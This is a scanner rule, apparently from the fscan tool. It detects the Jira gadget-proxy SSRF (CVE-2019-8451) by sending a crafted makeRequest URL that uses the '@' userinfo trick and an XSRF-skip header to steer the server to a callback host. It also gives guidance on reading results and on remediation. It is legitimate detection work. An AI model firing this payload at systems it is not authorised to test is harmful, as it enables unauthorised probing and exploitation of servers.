mirror of https://github.com/qwqdanchun/fscan.git
# Scanner rule: out-of-band check for the Jira server-side request forgery
# tracked as CVE-2019-8451 (see the Atlassian issue under detail.links).
#
# Reading a result:
#   - A hit means the Jira host itself made an outbound HTTP request to the
#     callback endpoint, i.e. the gadget proxy can be steered to a host other
#     than the Jira instance.
#   - No hit is not proof of a patched server: filtered egress or a callback
#     arriving after the wait window also produces a negative.
#   - For log review, the request this rule sends is a GET to
#     /plugins/servlet/gadgets/makeRequest whose `url` parameter carries an
#     `@` in the authority part.
# Remediation: follow the fix guidance in the linked Atlassian issue; until
# then, restrict the Jira server's outbound access and access to this servlet.
name: poc-yaml-jira-ssrf-cve-2019-8451

set:
  # Scheme and host of the target being scanned, taken from the request.
  originScheme: request.url.scheme
  originHost: request.url.host
  # Callback endpoint used to observe the server-side fetch.
  # NOTE(review): provided by the scanner's reverse platform - confirm it is
  # configured, otherwise this rule cannot produce a positive.
  reverse: newReverse()
  reverseHost: reverse.url.host
  reverseURL: reverse.url.path

rules:
  - method: GET
    # The `url` value puts the Jira host before `@` (the userinfo position)
    # and the callback host after it, so the URL starts with the Jira origin
    # while its actual host is the callback endpoint.
    path: >-
      /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}}
    headers:
      # Atlassian header that tells the server to skip XSRF token checking.
      X-Atlassian-Token: 'no-check'
    # True only when the callback endpoint sees a request within the wait
    # window (5, presumably seconds - confirm against the scanner's docs).
    expression: |
      reverse.wait(5)

detail:
  author: 'jingling(https://github.com/shmilylty)'
  links:
    - 'https://jira.atlassian.com/browse/JRASERVER-69793'